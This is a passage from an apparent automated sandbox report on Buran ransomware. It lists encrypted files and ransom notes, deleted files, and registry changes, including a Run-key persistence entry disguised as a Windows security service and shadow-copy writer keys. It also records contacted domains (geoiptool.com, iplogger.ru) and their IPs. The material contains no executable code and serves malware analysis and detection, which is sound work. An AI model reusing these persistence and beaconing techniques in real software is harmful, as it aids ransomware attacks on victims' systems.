676 "C:\\Host.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
677 "C:\\Host.pdf",
678 "C:\\Host.pdf.3217EE46-3DA6-888C-CFD6-E175EC571166",
679 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
680 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.3217EE46-3DA6-888C-CFD6-E175EC571166",
681 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
682 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
683 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.3217EE46-3DA6-888C-CFD6-E175EC571166",
684 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
685 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
686 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
687 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
688 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
689 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
690 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
691 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
692 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
693 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
694 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
695 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
696 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
697 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.3217EE46-3DA6-888C-CFD6-E175EC571166",
698 "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
699 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE"
700
701
702* Deleted Files:
703 "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
704 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
705 "C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe",
706 "C:\\.doc",
707 "C:\\.htm",
708 "C:\\.jpeg",
709 "C:\\.jpg",
710 "C:\\.pptx",
711 "C:\\.txt",
712 "C:\\.xls",
713 "C:\\Host.bmp",
714 "C:\\Host.docx",
715 "C:\\Host.html",
716 "C:\\Host.jpeg",
717 "C:\\Host.jpg",
718 "C:\\Host.pdf",
719 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
720 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
721 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
722 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
723 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
724 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
725 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
726 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
727 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT"
728
729
730* Modified Registry Keys:
731 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
732 "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
733 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
734 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
735 "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
736 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
737 "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
738 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
739 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
740 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
741 "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
742 "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
743 "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)"
744
745
746* Deleted Registry Keys:
747
748* DNS Communications:
749
750 "type": "A",
751 "request": "geoiptool.com",
752 "answers":
753
754
755 "type": "A",
756 "request": "iplogger.ru",
757 "answers":
758
759
760
761* Domains:
762
763 "ip": "158.69.67.193",
764 "domain": "geoiptool.com"
765
766
767 "ip": "88.99.66.31",
768 "domain": "iplogger.ru"
769
770
771
772* Network Communication - ICMP:
773
774* Network Communication - HTTP:
775
776* Network Communication - SMTP:
777
778* Network Communication - Hosts:
779
780* Network Communication - IRC: